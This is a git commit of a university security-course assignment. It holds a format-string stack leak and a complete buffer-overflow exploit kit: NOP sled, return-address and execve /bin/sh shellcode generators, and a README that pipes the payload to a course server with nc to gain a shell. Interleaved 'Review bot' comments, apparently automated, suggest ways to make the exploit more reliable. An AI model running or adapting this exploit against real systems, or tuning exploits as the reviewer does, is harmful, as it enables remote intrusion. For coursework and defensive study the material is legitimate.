authorCamil Staps2015-12-09 13:23:26 +0000
committerCamil Staps2015-12-09 13:23:26 +0000
commit78e74ea02fd52962290e2a1b816a90d9b9514a82 (patch)
treefa213fd71f72c6de405556e62551942f0e3f7a68
parentAssignment 2, 3 (diff)
Assignment 4
-rw-r--r--.gitmodules3
-rw-r--r--CamilStaps-s4498062-Assignment-4/ex1/ex1.txt42
-rw-r--r--CamilStaps-s4498062-Assignment-4/ex1/exploit/README18
-rw-r--r--CamilStaps-s4498062-Assignment-4/ex1/exploit/exploitbin0 -> 561 bytes
-rwxr-xr-xCamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh16
-rwxr-xr-xCamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh16
-rwxr-xr-xCamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh4
-rwxr-xr-xCamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh9
-rwxr-xr-xCamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh17
m---------CamilStaps-s4498062-Assignment-4/ex3/bash-covert-channel0
-rw-r--r--CamilStaps-s4498062-Assignment-4/ex3/ex36
11 files changed, 131 insertions, 0 deletions
diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000..d196b36
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "CamilStaps-s4498062-Assignment-4/ex3/bash-covert-channel"]
+ path = CamilStaps-s4498062-Assignment-4/ex3/bash-covert-channel
+ url = git@gist.github.com:0bae6b1c064f608a3808.git
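Review bot: The submodule URL on the last line uses the SSH form `git@gist.github.com:0bae6b1c064f608a3808.git`, so `git clone --recursive` (or `git submodule update`) fails for anyone without a GitHub SSH key, which presumably includes whoever grades this. The anonymous-readable form `url = https://gist.github.com/0bae6b1c064f608a3808.git` fetches the same gist without credentials. The exact commit is pinned in the tree, so reproducibility is otherwise fine.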
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/ex1.txt b/CamilStaps-s4498062-Assignment-4/ex1/ex1.txt
new file mode 100644
index 0000000..0f72c75
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/ex1.txt
@@ -0,0 +1,42 @@
+a
+ Determining the buffer size:
+
+ 1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+ 123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234P���
+
+ The buffer size seems to be 500.
+
+ Finding the return address:
+
+ %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
+ 0x7ffff7ff81fe0x7ffff7dd8de00xfbad20880x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x7fffffffe4500x7fffffffe6700x4006b2(nil)0x1004005300x7fffffffe6800x4006cb(nil)0x7ffff7a70ead(nil)0x7fffffffe7680x1000000000x4006c2(nil)0xc5584fe82b4455a40x4005300x7fffffffe760(nil)(nil)0x3aa7b017e66455a40x3aa7a0a6379455a40x7fff00000000(nil)(nil)0x4006f00x7fffffffe7680x1(nil)(nil)0x4005300x7fffffffe760(nil)0x4005590x7fffffffe7580x1c0x10x7fffffffe95e(nil)0x7fffffffe97b0x7fffffffe9890x7fffffffe9a50x7fffffffe9b90x7fffffffe9cb0x7fffffffe9d50x7fffffffe9e00x7fffffffe9ee0x7fffffffe9fb0x7fffffffea0f0x7fffffffea1d0x7fffffffea5f0x7fffffffea700x7fffffffef910x7fffffffefb70x7fffffffefc70x7fffffffefd5(nil)0x210x7ffff7ffb0000x100x78bfbff0x60x10000x110x640x30x4000400x40x380x50x80x70x7ffff7ddd0000x8(nil)0x90x4005300xb0xfffe0xc0xfffe0xd0xfffe0xe0xfffe0x17(nil)0x190x7fffffffe9390x1f0x7fffffffefdb0x
f0x7fffffffe949(nil)(nil)0xd48cc06ec9bfc1000xd262ac27f415a2b90x34365f3638782a(nil)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���
+
+ Let's break this up:
+
+ 0x7ffff7ff81fe
+ 0x7ffff7dd8de0 <-- saved frame pointer *printf
+ 0xfbad2088 <-- return address *printf
+ 0x7025702570257025 <-- buffer
+ ...
+ 0x7025702570257025
+ 0x7fffffffe450 <-- perhaps some local variable, looks like a pointer
+ 0x7fffffffe670 <-- saved frame pointer parent function
+ 0x4006b2 <-- return address parent function
+ (nil)
+ 0x100400530
+ ...
+
+ The saved frame pointer of the *printf function is 0x7ffff7dd8de0, so the buffer address is around that, probably a bit lower.
+
+b
+ Lucky me, during the SWS course I found a usable exploit on the vulnerable server. Let's use that one. See directory exploit.
+
+ Changes to the original:
+
+ * genexploit.sh, 34 changed to 434 (buffer changed from 100 to 500)
+ * genretaddr.sh, return address updated
+ * README, 2266 replaced with 2288
+
+c
+ The server crashed on Tuesday evening, I didn't pursue this any further.
+
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/README b/CamilStaps-s4498062-Assignment-4/ex1/exploit/README
new file mode 100644
index 0000000..9e055de
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/README
@@ -0,0 +1,18 @@
+Usage: ./exploit.sh | nc hackme.cs.ru.nl 2288
+
+You start with control over input. Send EOF (ctrl+D) to send the exploit. Input control
+is then returned to you. Note that the shell will not echo a prompt. Just try some commands.
+
+If the exploit does not function out of the box, use the initial control to send format
+string (50 times %p). Get the desired return address from this (it's the 8 bytes before the
+stored frame pointer, 16 bytes before the current return address, in "int ret", right behind
+the buffer now recognizable by the run of 0x7025702570257025). Change the return address
+in genretaddr.sh. Run genexploit.sh to generate the new exploit. Note that the return address
+tends to drift, even with ASLR turned off. See genretaddr.sh for details.
+
+If the shellcode must be altered, do so in genshellcode.sh. If this also means the padding
+must be altered, change the number of NOPs in genexploit.sh (the first loop). If necessary,
+also alter the number of copies of the return address in genexploit.sh (the second loop).
+
+If you need more than a single try in one session (e.g. when ASLR is turned on), change
+exploit.sh to use the commented loop instead of `cat - exploit -`.
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit
new file mode 100644
index 0000000..4882996
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit
Binary files differ
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh
new file mode 100755
index 0000000..3c21d53
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh
@@ -0,0 +1,16 @@
+#!/bin/sh
+cat exploit -
+
+# cat - exploit - is the "best" way of doing this:
+#
+# It lets you explore the target using format strings, so that you can
+# craft your exploit into "exploit", execute it by sending EOF (ctrl+D),
+# and then once again you have direct input options.
+#
+# Can also solve this with a looping construct, for when you need more
+# than one try, e.g.
+#while [ 1 ]
+#do
+# cat -
+# cat exploit
+#done
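Review bot: The active line `cat exploit -` sends the payload first and only then hands stdin over, but the README's usage text ("You start with control over input. Send EOF to send the exploit") describes the `cat - exploit -` form that this file's own comment on line 4 calls the better one — the script and its documentation disagree. Either change line 2 to `cat - exploit -` or reword the README to match what the script does. The file `exploit` is also opened relative to the working directory, so running `./exploit.sh` from elsewhere makes cat report the missing file on stderr while nc receives only your typing; `cd "$(dirname "$0")" || exit 1` before the cat pins the payload location.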
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh
new file mode 100755
index 0000000..5d46c8f
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+./genretaddr.sh
+./gennop.sh
+./genshellcode.sh
+for i in {1..434}
+do
+ cat nop >> exploittmp
+done
+cat shellcode >> exploittmp
+for i in {1..12}
+do
+ cat retaddr >> exploittmp;
+done
+tr -d "\n" < exploittmp > exploit
+echo >> exploit
+rm shellcode retaddr nop exploittmp
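Review bot: Every fragment is appended to `exploittmp` with `>>` and the file is only removed at the very end, so a run that is interrupted before the `rm` (or one of the gen scripts failing, which nothing checks) leaves a stale `exploittmp` that the next run silently prepends to its payload; `set -e` and `rm -f exploittmp` right after the shebang close both holes. `tr -d "\n"` then deletes every 0x0a byte, not just the newlines `echo -e` appends — the current return address and shellcode happen to contain none, but a future address ending in 0x0a would be corrupted without any error, which deserves a comment next to that line. The layout assumes the 434 NOPs plus 30 shellcode bytes (464) put the 8-byte return-address copies on the same 8-byte stride as the saved return slot, which for a 500-byte buffer only holds if the compiler padded it; I cannot confirm that from the hunk, so recording the assumption as a comment above the second loop would help whoever next changes the buffer size.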
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh
new file mode 100755
index 0000000..e2b0fe7
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+echo -e "\x90" > nop
+
+# Could also use a sled of pushes but that changes the stack so less elegant. \ No newline at end of file
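Review bot: `echo -e "\x90"` writes the NOP byte plus a newline, which is why the caller has to strip newlines from the assembled payload afterwards; `printf '\x90' > nop` emits exactly the one byte and removes the need for that post-processing. Same remark applies to the sibling gen scripts, each of which leaves a trailing newline that the assembler script must remove.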
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh
new file mode 100755
index 0000000..1a741f2
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+echo -e "\x70\xe4\xff\xff\xff\x7f\x00\x00" > retaddr
+
+# 0x00007fffffffe470
+
+# We've noticed that even with ASLR turned off, the correct return
+# address can drift a few hundred bytes. We haven't determined a
+# cause for this. Take this into consideration when creating, guiding
+# and grading the assignment.
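Review bot: The byte string on line 2 is the hand-reversed little-endian form of the address in the comment, and nothing ties the two together, so they can drift apart silently; `perl -e 'print pack("Q<", 0x7fffffffe470)' > retaddr` derives the bytes from the one readable constant and also emits no trailing newline. The "drift of a few hundred bytes with ASLR off" the comment describes is consistent with the process environment or argument vector differing in size between launches (the stack base is fixed, but everything above main's frame shifts with it) — I cannot confirm that from here, but it is the usual cause and worth mentioning in the comment as the first thing to check. Whatever the cause, aiming the return address at the middle of the 434-byte NOP sled rather than near its start buys roughly ±200 bytes of tolerance for free. The two NUL bytes in the address are fine only because the server evidently reads the payload with a length-bounded read rather than as a C string; a comment stating that assumption would save the next person a debugging round.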
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
new file mode 100755
index 0000000..63fa491
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+echo -e "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" > shellcode
+
+# This shellcode translates as follows:
+#
+# "\x48\x31\xd2" // xor %rdx, %rdx
+# "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx
+# "\x48\xc1\xeb\x08" // shr $0x8, %rbx
+# "\x53" // push %rbx
+# "\x48\x89\xe7" // mov %rsp, %rdi
+# "\x52" // push %rdx // There is an error in the "original", push %rax will push
+# // some random stuff on the stack, instead of NULL, which will
+# // cause the execve to fail with EFAULT (-14). See man execve.
+# "\x57" // push %rdi
+# "\x48\x89\xe6" // mov %rsp, %rsi
+# "\xb0\x3b" // mov $0x3b, %al
+# "\x0f\x05" // syscall \ No newline at end of file
diff --git a/CamilStaps-s4498062-Assignment-4/ex3/bash-covert-channel b/CamilStaps-s4498062-Assignment-4/ex3/bash-covert-channel
new file mode 160000
+Subproject f8ff6345aa7d3914e578675563c67ca69a2bd28
diff --git a/CamilStaps-s4498062-Assignment-4/ex3/ex3 b/CamilStaps-s4498062-Assignment-4/ex3/ex3
new file mode 100644
index 0000000..55e76f1
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex3/ex3
@@ -0,0 +1,6 @@
+a
+ See bash-covert-channel/readme.
+
+b
+ I didn't find anything in the logs. This seems to be because chmods aren't logged.
+ The OS could monitor chmods, and log many chmods on the same file / restrict the number of chmods on the same file within some time frame.